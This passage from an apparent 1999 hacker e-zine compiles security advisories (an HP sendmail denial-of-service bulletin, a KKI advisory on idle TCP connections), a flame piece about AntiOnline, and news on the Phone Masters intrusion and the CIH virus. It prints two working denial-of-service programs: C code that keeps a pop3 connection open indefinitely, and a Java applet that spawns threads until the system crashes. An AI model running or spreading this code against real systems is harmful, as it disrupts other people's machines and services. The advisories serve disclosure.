CLOSE(sock);
exit(1);
}
@HWA
45.0 HP Sendmail 8.8.6 DoS
~~~~~~~~~~~~~~~~~~~~~
Date: Mon, 26 Apr 1999 14:46:41 -0700 (PDT)
From: CIAC Mail User <ciac@rumpole.llnl.gov>
To: ciac-bulletin@rumpole.llnl.gov
Subject: CIAC Bulletin J-040: HP-UX Security Vulnerability in sendmail
[ For Public Release ]
-----BEGIN PGP SIGNED MESSAGE-----
__________________________________________________________
The U.S. Department of Energy
Computer Incident Advisory Capability
___ __ __ _ ___
/ | /_\ /
\___ __|__ / \ \___
__________________________________________________________
INFORMATION BULLETIN
HP-UX Security Vulnerability in sendmail
April 26, 1999 17:00 GMT Number J-040
___________________________________________________________________________
PROBLEM: sendmail release 8.8.6 causes Denial of Service failures.
PLATFORM: HP 9000 Series 700/800 Servers running HP-UX 10.20 and 11.00
DAMAGE: Users can initiate a Denial of Service.
SOLUTION: Apply the publicly available patches.
___________________________________________________________________________
VULNERABILITY The risk is high. The HP bulletin states that this should be
ASSESSMENT: done as soon as possible.
___________________________________________________________________________
[Start of Hewlett-Packard bulletin]
Document ID: HPSBUX9904-097
Date Loaded: 19990419
Title: Security Vulnerability in sendmail
- -------------------------------------------------------------------------
HEWLETT-PACKARD COMPANY SECURITY BULLETIN: #00097, 20 April 1999
- -------------------------------------------------------------------------
The information in the following Security Bulletin should be acted upon
as soon as possible. Hewlett-Packard Company will not be liable for any
consequences to any customer resulting from customer's failure to fully
implement instructions in this Security Bulletin as soon as possible.
- -------------------------------------------------------------------------
PROBLEM: sendmail release 8.8.6 causes Denial of Service failures.
PLATFORM: HP 9000 Series 700/800 Servers running HP-UX 10.20 and 11.00
DAMAGE: Users can initiate a Denial of Service.
SOLUTION: Apply the patches listed below.
AVAILABILITY: All patches are available now.
- -------------------------------------------------------------------------
I.
A. Background
Hewlett-Packard Company HP9000 Series 700/800 systems that are
running sendmail release 8.8.6 accept connections sub-optimally,
which cause security problems. Public domain fixes now in sendmail
8.9.3 have been ported to HP-UX sendmail 8.8.6 release patch.
B. Fixing the problem
For HP-UX releases prior to 10.20, upgrade from sendmail 5.65 to
sendmail release 8.8.6. See www.software.hp.com
For HP-UX release 10.20: PHNE_17135;
For HP-UX release 11.00: PHNE_17190.
C. To subscribe to automatically receive future NEW HP Security
Bulletins or access the HP Electronic Support Center, use your
browser to get to our ESC web page at:
http://us-support.external.hp.com (for non-European locations),
or http://europe-support.external.hp.com (for Europe)
Login with your user ID and password (or register for one).
Remember to save the User ID/password assigned to you.
Once you are in the Main Menu:
To -subscribe- to future HP Security Bulletins,
click on "Support Information Digests".
To -review Security bulletins already released-,
click on the "Search Technical Knowledge Database."
To -retrieve patches-, click on "Individual Patches" and select
appropriate release and locate with the patch identifier (ID).
To -browse the HP Security Bulletin Archive-, select the link at
the bottom of the page once in the "Support Information Digests".
To -view the Security Patch Matrix-, (updated daily) which
categorizes security patches by platform/OS release, and by
bulletin topic, go to the archive (above) and follow the links.
The security patch matrix is also available via anonymous ftp:
us-ffs.external.hp.com or ~ftp/export/patches/hp-ux_patch_matrix
D. To report new security vulnerabilities, send email to
security-alert@hp.com
Please encrypt any exploit information using the security-alert
PGP key, available from your local key server, or by sending a
message with a -subject- (not body) of 'get key' (no quotes) to
security-alert@hp.com.
Permission is granted for copying and circulating this Bulletin to
Hewlett-Packard (HP) customers (or the Internet community) for the
purpose of alerting them to problems, if and only if, the Bulletin
is not edited or changed in any way, is attributed to HP, and
provided such reproduction and/or distribution is performed for
non-commercial purposes.
Any other use of this information is prohibited. HP is not liable
for any misuse of this information by any third party.
________________________________________________________________________
- -----End of Document ID: HPSBUX9904-097-----------------------------------
[End of Hewlett-Packard bulletin]
___________________________________________________________________________
CIAC wishes to acknowledge the contributions of Hewlett-Packard Company for
the information contained in this bulletin.
___________________________________________________________________________
CIAC, the Computer Incident Advisory Capability, is the computer
security incident response team for the U.S. Department of Energy
(DOE) and the emergency backup response team for the National
Institutes of Health (NIH). CIAC is located at the Lawrence Livermore
National Laboratory in Livermore, California. CIAC is also a founding
member of FIRST, the Forum of Incident Response and Security Teams, a
global organization established to foster cooperation and coordination
among computer security teams worldwide.
CIAC services are available to DOE, DOE contractors, and the NIH. CIAC
can be contacted at:
Voice: +1 925-422-8193
FAX: +1 925-423-8002
STU-III: +1 925-423-2604
E-mail: ciac@llnl.gov
For emergencies and off-hour assistance, DOE, DOE contractor sites,
and the NIH may contact CIAC 24-hours a day. During off hours (5PM -
8AM PST), call the CIAC voice number 925-422-8193 and leave a message,
or call 800-759-7243 (800-SKY-PAGE) to send a Sky Page. CIAC has two
Sky Page PIN numbers, the primary PIN number, 8550070, is for the CIAC
duty person, and the secondary PIN number, 8550074 is for the CIAC
Project Leader.
Previous CIAC notices, anti-virus software, and other information are
available from the CIAC Computer Security Archive.
World Wide Web: http://www.ciac.org/
(or http://ciac.llnl.gov -- they're the same
machine)
Anonymous FTP: ftp.ciac.org
(or ciac.llnl.gov -- they're the same machine)
Modem access: +1 (925) 423-4753 (28.8K baud)
+1 (925) 423-3331 (28.8K baud)
CIAC has several self-subscribing mailing lists for electronic
publications:
1. CIAC-BULLETIN for Advisories, highest priority - time critical
information and Bulletins, important computer security information;
2. SPI-ANNOUNCE for official news about Security Profile Inspector
(SPI) software updates, new features, distribution and
availability;
3. SPI-NOTES, for discussion of problems and solutions regarding the
use of SPI products.
Our mailing lists are managed by a public domain software package
called Majordomo, which ignores E-mail header subject lines. To
subscribe (add yourself) to one of our mailing lists, send the
following request as the E-mail message body, substituting
ciac-bulletin, spi-announce OR spi-notes for list-name:
E-mail to ciac-listproc@llnl.gov or majordomo@rumpole.llnl.gov:
subscribe list-name
e.g., subscribe ciac-bulletin
You will receive an acknowledgment email immediately with a confirmation
that you will need to mail back to the addresses above, as per the
instructions in the email. This is a partial protection to make sure
you are really the one who asked to be signed up for the list in question.
If you include the word 'help' in the body of an email to the above
address,
it will also send back an information file on how to subscribe/unsubscribe,
get past issues of CIAC bulletins via email, etc.
PLEASE NOTE: Many users outside of the DOE, ESnet, and NIH computing
communities receive CIAC bulletins. If you are not part of these
communities, please contact your agency's response team to report
incidents. Your agency's team will coordinate with CIAC. The Forum of
Incident Response and Security Teams (FIRST) is a world-wide
organization. A list of FIRST member organizations and their
constituencies can be obtained via WWW at http://www.first.org/.
This document was prepared as an account of work sponsored by an
agency of the United States Government. Neither the United States
Government nor the University of California nor any of their
employees, makes any warranty, express or implied, or assumes any
legal liability or responsibility for the accuracy, completeness, or
usefulness of any information, apparatus, product, or process
disclosed, or represents that its use would not infringe privately
owned rights. Reference herein to any specific commercial products,
process, or service by trade name, trademark, manufacturer, or
otherwise, does not necessarily constitute or imply its endorsement,
recommendation or favoring by the United States Government or the
University of California. The views and opinions of authors expressed
herein do not necessarily state or reflect those of the United States
Government or the University of California, and shall not be used for
advertising or product endorsement purposes.
LAST 10 CIAC BULLETINS ISSUED (Previous bulletins available from CIAC)
J-030: Microsoft BackOffice Vulnerability
J-031: Debian Linux "Super" package Buffer Overflow
J-032: Windows Backdoors Update II:
J-033: SGI X Server Font Path Vulnerability
J-034: Cisco 7xx TCP and HTTP Vulnerabilities
J-035: Linux Blind TCP Spoofing
J-036: LDAP Buffer overflow against Microsoft Directory Services
J-037: W97M.Melissa Word Macro Virus
J-038: HP-UX Vulnerabilities (hpterm, ftp)
J-039: HP-UX Vulnerabilities (MC/ServiceGuard & MC/LockManager, DES
-----BEGIN PGP SIGNATURE-----
Version: 4.0 Business Edition
iQCVAwUBNySJe7nzJzdsy3QZAQHNBwP/c9SF9GjFRwhkNjYdr6Hs7eyAdh23JoKE
jcWLPR3qIdBg/uENXqe6Jz+G9t5V4qORE592wi+KgLNuLypm2A4wHmJS7Agdb8Pt
DilC6Kh5VRGUtn+TknLRLcj1DsHpTnaJ5cmN3ozvqX1H566xfn2jexWSuHujECH3
fz8VGVHwfpE=
=7fHx
-----END PGP SIGNATURE-----
@HWA
46.0 KKI inactive connections security advisory
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Wed, 28 Apr 1999 13:59:28 +0200
From: Lukasz Luzar <lluzar@SECURITY.KKI.PL>
To: BUGTRAQ@netspace.org
Subject: KKIS.28041999.002.b
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
### ### ### ### ###
### ### ### ### ###
###### ###### ###
### ### ### ### ###
### ### ### ### ###
S E C U R I T Y
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Contacts ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
KKI Security Team Cracow Commercial Internet
http://www.security.kki.pl http://www.kki.pl
mailto:security@security.kki.pl mailto:biuro@kki.pl
~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Informations ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Raport title : Flaws in implementations of mechanisms which
prevents from maintaining the parasitize connections
in many tcp network services.
Problem found by : Lukasz Luzar (lluzar@security.kki.pl)
Raport created by : Robert Pajak (shadow@security.kki.pl)
Lukasz Luzar (lluzar@security.kki.pl)
Raport published : 28 April 1999
Raport code : KKIS.28041999.002.b
Vulnerable programs : qpopper, in.pop3, cucipop, telnetd, ...
Systems affected : Linux, FreeBSD, Solaris, ...
Archive : http://www.security.kki.pl/advisories/
Risk level : low
~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Description ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The designers of many popular network services are trying to make the
mechanisms which should prevents from maintaining the parasitize connections
to their programs.
The exercise of such protection is timeout, which closes inactive
connections.
But some of those designers forgets that some malicious guys may often
and fraquently send strings full of bad or null commands to the open port
of the service. Such situation might happen before login/password
authentication of the connection.
Those programmers should implement additional mechanisms to prevent such
situations. Good solution is to put counter of bad (or null) commands
inside the program.
For example, the similiar mechanism has been applied in sendmail.
This soluition is effective and very easy to implement.
Lack of this mechanism may be quite threateing, because most of that tcp
services are working with root privilages, and the bounds of amount of root
proceses isn't easy, when the service has no internal bound.
That affects whole system, when proccess table is fulfiled for
example by multiply open connections to the vulnerable tcp service.
Worst situation is, when vulnerable service doesn't logs any information
about connection before authentication with login/password.
One of this most vulnerable services is cucipop.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Impact ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Below example shows how to open and maintain the connection,
which might state open by undefined time.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Example ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
--- CUT HERE ---
/*
* example.c by Lukasz Luzar (lluzar@security.kki.pl)
*/
#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
/* victim's address and port of service */
#define ADDR "10.0.0.1" //IP in dot natation
#define PORT 110 //e.g. some pop3
#define DELAY 4 //(4 secs.) how often we are sending bad commands
#define COMMAND "\n" //some bad (or null) command
void main()
{
int sockfd,
j,k;
struct sockaddr_in victim_addr;
bzero((char *) &victim_addr, sizeof( victim_addr));
victim_addr.sin_family = AF_INET;
victim_addr.sin_addr.s_addr = inet_addr( ADDR);
victim_addr.sin_port = htons( PORT);
if(( sockfd = socket( AF_INET, SOCK_STREAM, 0)) < 0)
fprintf( stderr, "socket error\n");
if( connect( sockfd,(struct sockaddr*) &victim_addr,
sizeof( victim_addr)) < 0)
fprintf( stderr,"connect error\n");
k = 1;
if( setsockopt( sockfd,IPPROTO_TCP,TCP_NODELAY,&k,sizeof( k)) != 0)
fprintf( stderr,"setsockopt error\n");
j = strlen( COMMAND);
for(;;) {
if( write( sockfd,COMMAND,j) == -1)
fprintf( stderr,"write error\n");
fprintf( stderr,".");
sleep( DELAY);
}
}
--- CUT HERE ---
~~~~~~~~~~~~~~~~~~~~~~~~~[ Copyright statement ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Copyright (c) 1999 KKI Security Team, Poland
All rights reserved.
All questions please address to mailto:security@security.kki.pl
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
@HWA
47.0 How to achieve the status JP has with AntiOnline (from PacketStorm)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
AntiOnline Mini-howto
Shark Fin, ph1sh@pmc.com.au
v1.0, 28 April 1999
This document discusses the techniques used and implemented by well
known `media whore' John Vranesevich (aka JP). It also includes full
details of how you to can implement such techniques to achieve the
same status as JP has. This document is not endorsed nor sponsored by
AntiOnline.
_____________________________________________________________________
Table of Contents
1. Introduction
1.1 Overview
1.2 History
1.3 Future Revisions
1.4 Feedback
1.5 Copyright
1.6 Standard Disclaimer
2. What is AntiOnline
3. Techniques used by AntiOnline
3.1 The `rip'
3.2 The `narq'
3.3 IRC Warrior acts
4. Overview
_____________________________________________________________________
1. Introduction
1.1 Overview
The purpose of this document is to discuss and detail the deplorable
morals and techniques implemented by JP and the running of his
website. It will shed important light on the true workings of
AntiOnline for newcomers.
This document is not endorsed nor sponsered by AntiOnline in any way.
1.2 History
- v1.0 Descripion of morals and techniques employed by AntiOnline
1.3 Future Revisions
If the deplorable and unprecedented acts of commercialism, `narqing',
code ripping, IRC Warrior Acts, lying, plagorism. etc. that we have
come to expect from AntiOnline there should be future revisions of
this document.
1.4 Feedback
I welcome any feedback on this document to ph1sh@pmc.com.au,
comments supporting or defending AntiOnline's morals are symlinked
to /dev/null .
1.5 Copyright
The AntiOnline Mini-howto is copyrighted (c)1999 ph1sh
(yes, you to JP)
1.6 Standard Disclaimer
I disavow any potential liability for the contents of this document.
Use it at your own risk. Rest assured however that the contents of
this document are all verified.
2. What is AntiOnline?
The AntiOnline Network per-se, is a collection of sites, all ripped
by JP (jp@antionline.com) and his side kicks. It was originally
developed by JP in order 'to educate the public'. However, it bemises
me how someone who knows so little about computer security can
educate a thriving online community. And as the host of the newly
found D.o.S tool, `muerte', being the main feature of the site, I
also fail to see how the public is educated in any way.
AntiOnline was then moved to the University of Pittsburgh, where JP
was attending college. In time, someone at Pitt actually got a clue
and removed the site from the College server, obviously identifying
that the site's content and aims had nothing in common at all.
AntiOnline was duly moved to a Lazerlink account where it grew in
retardedness unbelievebly, posting ripped code and articles
where ever it could be done.
In true JP fashion, he has recently become a commercial sell-out by
hooking up with a couple of corporate sponsers and purchasing
expensive software just so he can make a neat hack attempts page.
3. Techniques used by AntiOnline
3.1 The `rip'
AntiOnline is notorious for publishing plagorised material. This
would probably represent the true lack of knowledge attained by JP,
and his lack of pride and creativity.
Prime examples include the Buffer Overflow special report
(http://www.antionline.com/SpecialReports/buffer_overflows), compare
this to aleph1's 'smashing the stack for fun and profit' released in
Phrack 49.
More recent examples of ripping by AntiOnline, are the layout to
AntiCode, completely ripped from freshmeat.net, and the editing
of code to insert credits to AntiCode, in some cases removing author
credits.
Lesser examples of ripping would be in ways claiming the hacker
wargames as a 'product of antionline', when they were old news
anyway. Also, JP's special report on hacker culture was a rip from
an article posted to attrition.org
3.2 The `narq'
Ok, JP will use you for publicity when you're going around using your
0-day kodez to break into lots of web sites, but are you really
dealing with someone who is interested in protecting your privacy?
NO. His recent reports on 'finger-printing' hackers (completely
moronic) just go to show that he is out there to help authorities
track you down. He is also believed to funding Carolyn P. Meinel in
her efforts to track down hackers.
3.3 IRC Warrior acts
Yep, hope you've got your system patched when you're sitting on IRC
and JP is around, ask anyone who keeps logs of his attacks for some
proof of incessant smurf attacks etc.
4.0 Overview
Ok, I got bored of wasting my time writing about JP so I'll wrap it
up here. AntiOnline is a collaborative effort to rip your code and
steal your ideas. Please help in spreading the word by posting this
howto wherever you can, and associating yourself with the right
people.
JP, take your legal crap somewhere else.
WWW: http://ph1sh.fsn.net
@HWA
48.0 Crash your browser.(JAVA)
~~~~~~~~~~~~~~~~~~~~~~~~~
Windows thread overrun from a Java Applet
Whether you found this page by searching Yahoo, reading a newsgroup, received an e-mail, or any other way, you obviously came here for one of two
reasons 1) you want to see what the talk is about, or 2) some "friend" of yours wanted you to get nailed by the problem.
The second reason is why I created this page. I've added this as a layer of indirection, and as a way to add information as more becomes available. In the
interest of security, I will periodically be changing the name of the applet and the page it's on, so that not too many people have problems from direct links
Background
I found this flaw as a part of some research I did beginning summer 1998, and ending December of the same. I have personally reported this security flaw on
two occasions, and I am certain that the overseeing professor (B Clifford Neuman, ISI) reported it himself. I have held off on creating a public spectacle of
this flaw for several months in an effort to give Sun and/or Microsoft an opportunity to correct the issue.
How It Works
It's rather simple, the applet simply creates more and more threads until the kernel panics. Probably the worst part is that the download is only 941 bytes,
smaller than a normal picture. Basically that means that even running on a 28.8 modem the download is less than 1/3 of a second, and by the time most people
would consider that there is a problem the applet is running. There is also an equivalent standard executable version, but I'm not going to discuss it here.
Isn't this just a DoS (Denial of Service) attack?
The debate rages on, there are some very valid points on both sides of the argument, but in the end, it doesn't really matter, this entire class of problems can
be solved (more information)
The Fix
It should be rather simple for either Microsoft or Sun to fix it. The fix would consist simply of adding threadsafe thread counting to the thread spawning code,
as well as the thread termination code. It would be most logical for Microsoft to fix the code because a standard executable that does the same thing.
Why I'm Bringing The Issue Up At All
Knowledge of the applet has been spreading slowly and may soon become an issue, so I'm attempting to get real information available before a problem
occurs.
Known Results
Windows 95
Ie3.x: No data
Ie4 (no alterations): crash
Ie4 (jdk 1.2): crash
Ie4 (jdk 1.21): crash
Ie5 (no alterations): crash
Ie5 (jdk 1.21): crash
Appletviewer (1.1.8, 1.2, 1.21): crash (very fast to very slow)
Netscape Communicator 4.x (no alterations): crash, there has been one report of the browser crashing without the computer crashing
Windows 98
Ie3.x: No data
Ie4 (no alterations): crash
Ie4 (jdk 1.2): crash
Ie4 (jdk 1.21): crash
Ie5 (no alterations): crash
Ie5 (jdk 1.21): crash
Appletviewer (1.1.8, 1.2, 1.21): crash (very fast to very slow)
Netscape Communicator 4.x (no alterations): crash, there has been one report of the browser crashing without the computer crashing
Windows NT: System performance degrades significantly but does not stop, but the browser hangs eventually (and attempting to start a new process can
cause a crash), system eventually becomes usable again
OS2 Warp: System performance degrades significantly but does not stop, but the browser hangs eventually (and attempting to start a new process can cause
a crash), system eventually becomes usable again
UNIX (Solaris, Tru64, Linux (Alpha)): System remains usable, the browser hangs eventually
Macintosh: System remains usable, the browser hangs or crashs
Please email me with any new results (or even if you want to confirm the posted results)
The Source
I've received numerous complaints about my releasing the source code. I'm taking this time to explain the reasoning behind it. The HTTP protocol is publicly
available as an RFC, which makes it easy enough for any would-be hacker to grab the applet without too much difficulty (but no one has complained about
me making this applet available publicly). Therefore releasing the source code serves only to make it possible for security measures to be developed quickly,
and efficiently, as well as developing protection against the entire class of attacks instead of just searching for this applet.
The Page
BEWARE!!!! CLICKING HERE IS NOT RECOMMENDED.
The Source
Questions
Please feel free to email me at ashwood@usc.edu if you have any questions regarding this applet.
Reporting abuse
If you have run across a page that you believe has this applet (or one similar) running on it, please e-mail me at ashwood@usc.edu ASAP. I will gladly
maintain the list of sites.
I am not the first to find this problem
I have not yet had the opportunity to verify it, but I have been informed that in the book titled "Tricks of the Java Programming Gurus" published in 1996.
import java.awt.*;
import java.applet.*;
public class minThread extends Applet implements Runnable {
Thread myThread = null;
int howMany = 0;
public static void main(String args[])
{
minThread that = new minThread();
that.start();
}
public void init() {
start();
}
public void start() {
// we start a new thread
myThread = new Thread(this);
myThread.start();
run();
// the code for the new Thread is in the run() method
}
public void run() {
try {
for (;;) {
myThread = new Thread(this);
myThread.start();
}
}
catch (Exception e)
{
//out of memory, so waste processor
for(;;)
{
}
}
}
public void stop() {
// myThread has to be stopped before the applet stops
myThread = null;
}
public void destroy() {
}
public void paint(Graphics g) {
}
}
49.0 Phone Rangers break into GTE
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Phone Masters Break Into GTE
contributed by epter
There is so much FUD (Fear, Uncertainty and Doubt)here it is hard to separate the facts from the
sensationalism. Evidently a group of "cyber terrorists" known as the "Phone Rangers" broke into the
computer/telephone network of GTE in the Dallas Fort Worth area. The "computer hackers" reportedly had the
ability to disrupt 911 calls, shut down police departments and warn drug dealers of wire taps. The
'hacks' reportedly started over four years ago and are only now being made public. What the article does not
say is whether the attacks have stopped or whether anyone has been arrested or charged with a crime. This
'report' is mostly what could have happened as opposed to what actually did happen.
WFAA Dallas FortWorth TV
http://www.wfaa.com/news/9904/29/cyber_terrorism_1.html
N E W S 8 I N V E S T I G A T E S
Cyber Terrorists Invade Phone Networks
by Robert Riggs
April 29 1999
GTE's network operations center at DFW International
Airport was targeted by computer hackers.
DALLAS -- It was the largest cyber-assault on the nation's communications networks.
A computer security breach received little attention when it was announced in Dallas last month. Hackers
had been caught stealing thousands of long distance calling card numbers.
News 8 Investigates learned it was a case with national
security implications.
A group of computer hackers invaded telephone systems so deeply that they could
shut down 911 operators. In fact, they retaliated for a speeding ticket by crashing the
phone system at a police department. They also tipped off drug dealers to wiretaps.
Until now, this cyber-attack has been a closely-guarded secret. Computer hackers
have broken into the networks of the world's largest telephone companies.
They were just a few keystrokes away from blinding air traffic controllers, shutting down banks,
or cutting off military bases. It's not the plot of the latest cyber-horror movie.
This frightening penetration of the nation's telecommunications systems actually happened
right here in North Texas.
The hackers' target list included GTE's 28-state network, controlled from a nerve center at DFW
International Airport. They had the capability of causing a "cyber Pearl Harbor"
had they wanted to.
FBI Agent Mike Morris led the investigation. "We had a number of telephone companies,
long distance carriers and local exchange carriers that thought the were impenetrable,"
Morris said. "They thought they were little castles."
HACKING HISTORY
The first confirmed break-in occurred four years ago when the hackers first took control of
computerized phone switches. The switches route calls around the world. The hackers
gained unrestricted access to GTE, Sprint, MCI and the regional Baby Bell networks.
Their early attacks went undetected, and alarmed top levels of the U.S. government.
Details about the case are only now becoming public.
"They could listen in on calls made through that switch," Morris explained. "If
they didn't like a person, they could turn their access off to that switch, meaning
if you tried to make a call out, it wasn't going to happen."
FBI LAUNCHES CYBER SQUAD
A tip set in motion an intensive FBI investigation that continues today. In Dallas, a
new cyber squad put a wiretap on the hackers' line. It marked the first time that agents could
monitor everything a hacker typed.
"The goal of the hackers was to basically take control of telecommunications systems
coast-to-coast," Morris said.
They came close.
THE PHONE MASTERS
FBI surveillance photos show some of the 11 hackers called the Phone Masters.
They gathered from across the country with cyber burglary tools in hand: a cloned cellular phone and
laptop computer.
The FBI identified Calvin Cantrell of Grand Prairie as a central figure in the organization.
The hackers fit the FBI's profile:
o white males
o teens to mid-20s
o self taught
o obsessed
"He wasn't very good at school, didn't make a lot of friends," Morris said of the
individuals who fit the profile. "But when he gets on the Internet and he hacks into
a system, now he basically is a cyber-God."
Even though the typical hacker is not a particularly good student, they are still
brilliant. "Some of these guys could be considered geniuses," Morris said.
"They're very smart, and they get very bored with school."
The FBI discovered that Cantrell was an unemployed 1988 graduate of Grand Prairie
High School. At his parent's home, Cantrell spent up to 20 hours a day hacking into
computer systems. The FBI said Cantrell took confidential credit and crime records out of
computer systems and traded people's secrets for cash.
"Calvin represented himself as an information
broker," said private investigator Trace Carpenter, who purchased personal
information from Cantrell. He said Cantrell bragged about even getting phone
records close to the President. "He was obtaining long distance records for Bill
Clinton's mother," Carpenter said. "I suppose this was in an effort to find a back
line into the Oval Office, so to speak."
HACKERS TARGET WHITE HOUSE
Indeed, the Phone Masters hacked into White House phone records and unlisted numbers, according to
sources in the telecommunications industry. "It shows the vulnerability of our everyday systems that
we use," said Assistant U.S. Attorney Matt Yarborough.
Yarborough is now prosecuting the Phone Masters for stealing millions of dollars worth of long distance
calling card numbers.
"Knowing and holding the keys to that system, any foreign agent or domestic hacker could choose to hack
it," Yarborough said. "That could have a wide-ranging impact on our financial institutions, power and
electrical, the systems we use and interact with every day."
The FBI said the Phone Masters discussed crashing vital computer systems. It's unclear what the hackers
may have done before the FBI got on their trail.
The hackers declined to talk to News 8.
@HWA
50.0 Police question CIH virus creator
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Police Question CIH Suspect
contributed by mdef
Taiwanese police are questioning Chen Ing-hau, 24,the self admitted creator of the CIH or Chernobyl virus that
struck earlier this week. Authorities have not yet arrested Chen Ing-hau, but are trying to clarify what, if
any, legal responsibility he could face if convicted.
BBC http://news.bbc.co.uk/hi/english/world/newsid_332000/332147.stm
Friday, April 30, 1999 Published at 10:26 GMT 11:26 UK
World
Chernobyl virus suspect
questioned
Chen Ing-hau could face a three-year jail sentence (see url for picture)
Police in Taiwan are questioning a computer expert who they say has admitted creating the Chernobyl virus,
which caused major disruption earlier this week.
Police say Chen Ing-hau, 24, has not been charged and their investigation is in its early stages.
He is said to have offered his help in efforts to counteract the virus.
Hundreds of thousands of computers
in Asia and the Middle East had their
data wiped by the malicious
programme on 26 April - the
anniversary of the Ukrainian nuclear
disaster in 1986.
Police say Mr Chen - who recently graduated from Taipei's Tatung Institute of Technology but is currently
doing his military service - has said he did not intend to cause such massive damage.
Authorities say they are trying to clarify what, if any,legal responsibility he could face if convicted.
In Taiwan, intentionally spreading a computer virus is an offence that carries a possible three-year prison term.
Boasting to colleagues
Although popularly dubbed Chernobyl, the virus is known to experts as CIH.
According to Taiwanese media reports, Mr Chen's colleagues say he had acknowledged using his own
initials in naming the virus.
Former classmates and instructors said he had boasted of creating the Chernobyl virus and warned friends not to
download it into their computers.
Some reports said Mr Chen had been reprimanded quietly by his institute a year ago but not further
disciplined, prompting an Internet debate about Taiwan's vigilance against cybercrime.
Deadly effects
The United States and Europe largely escaped the virus's effects this week, as companies had protected
their computers with anti-virus programs that killed it.
But in Asia and the Middle East the same precautions had in many cases been ignored.
Chernobyl also spreads through pirated software, which is rife in these parts of the world.
Chernobyl is less widespread than the e-mail replicator virus Melissa, but it has been warned to be far more
serious, especially on Windows 95 or 98 machines.
The virus can delete most of the data stored on computers and can even wipe out the BIOS - the basic
instructions that tell the computer to start.
@HWA
51.0 [ISN] The Virus Vault
~~~~~~~~~~~~~~~~~~~~~
Forwarded From: William Knowles <erehwon@kizmiaz.dis.org>
(April 28, 1999 12:46 a.m. EDT http://www.nandotimes.com) - Even the most
stout-hearted hard drive would shudder. Copies of more than 43,000
computer viruses are kept under lock and key at the Malicious Code
Laboratory in rural Pennsylvania, a facility operated by a company that
has become the equivalent of the World Health Organization for the data
processing industry.
"That lab in Carlisle, Pa., has good physical security. You cannot get in
without a key card," assures Roger Thompson, the affable, Australian-born
technical director for malicious code research for the firm.
His company - ICSA Inc., which has its headquarters in a Washington, D.C.,
suburb - uses the pernicious software to test and certify dozens of
commercial security programs that corporations and individuals hope will
protect them from malicious hackers.
Thompson said the list of known viruses grows by about 1,000 a month, but
many of these are simple modifications of older viruses.
"Of all of the thousands of viruses we've identified, only about 150
actually get onto very many people's computer desktops. And maybe another
500 or so make it to localized outbreaks," Thompson said.
The reason, despite tremendous media hype, is that computer viruses
generally have a hard time proliferating. Writers of virus programs have a
hard time designing a bug that will attack most personal computers because
of the incredible diversity of software that computers use.
"There are a few viruses that we call Win32-infectors, because they attack
the Windows operating system itself. But these are very hard to write, so
we don't see many of them," Thompson said.
Instead, virus authors rely upon "macro" programs that attach to specific
kinds of software.
"We've identified about 4,000 macro viruses that attach themselves to
Microsoft Office products. The reason these guys do this is they want
their viruses to spread, so they pick popular software," Thompson said.
Police arrested David L. Smith, 30, of Aberdeen Township, N.J., last month
and charged him with authorship of the "Melissa" virus, which disrupted
e-mail systems for several large companies, including Charles Schwab & Co.
"Melissa wasn't overly bright. It only targeted Microsoft Mail, which
isn't all that popular. But the guy found a good way to get his virus to
spread," Thompson said.
The program gummed up e-mail systems by sending out thousands of versions
of itself, as well as pornographic Web site passwords and addresses.
Despite its simplicity and the severe limitations on the kinds of software
it attacks, Melissa received enough news coverage to accelerate security
concerns for businesses that increasingly rely upon the Internet.
"We are now a wired world," said Laurie W. Wagner, senior vice president
for marketing at ICSA. "So security has become an issue for everyone, from
simple consumer marketing to business-to-business transfer of critical
information."
Wagner said anti-virus programs and other software designed to protect
computer equipment are expected to grow from a $5 billion industry in 1997
to $25 billion by 2003. That's a lot of money in order to stop a handful
of bored and mostly youthful mischief-makers.
"A lot of them truly are kids," Thompson said. "I've met one guy who used
to be known as 'Storm-Bringer' who has come across from the dark side. He
was an intelligent young man who just decided to grow up. It was clear
that this (virus writing) was something he did just because he knew how."
Measures to defeat "hackers" - computer enthusiasts who delight in gaining
access to private, often sensitive, computer files using telephone lines
or the Internet - are also becoming big business. Internet security
services alone are projected to grow from a $4.6 billion market in 1996 to
$11.6 billion within three years.
ICSA computers at its Reston, Va., headquarters endlessly look for ways
that hackers could break into corporate data systems. Once identified,
these "back doors" are either closed or given "firewall" software
protection to prevent unwanted outside access across the Internet.
"Frequently, we find a lot of undocumented Web addresses that companies
didn't know about," Wagner said. Hackers can gain access to an entire
computer system through an unprotected site on the Web.
"We conducted a scan for one company that had more than 1,000 undocumented
sites," she said. "They were pretty surprised."
-o-
Subscribe: mail majordomo@repsec.com with "subscribe isn".
Today's ISN Sponsor: Hacker News Network [www.hackernews.com]
@HWA
52.0 [ISN] The Bad Guys are Crackers
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The Bad Guys Are Crackers
In Defense of Hackers
Will there be more and more hackers over the next couple of years?
Brent Gomes
I sincerely hope so! Now, before you label me as some crazed
anarchist, let me explain. Most of us geeks who are in the technology
business believe ourselves to be hackers, and if someone ever calls me one
I consider it a compliment. It's time to dispel some rumors about hackers
and clear the air about one of the most misused terms of the computer
generation.
The ancient definition of a hacker is someone who makes furniture
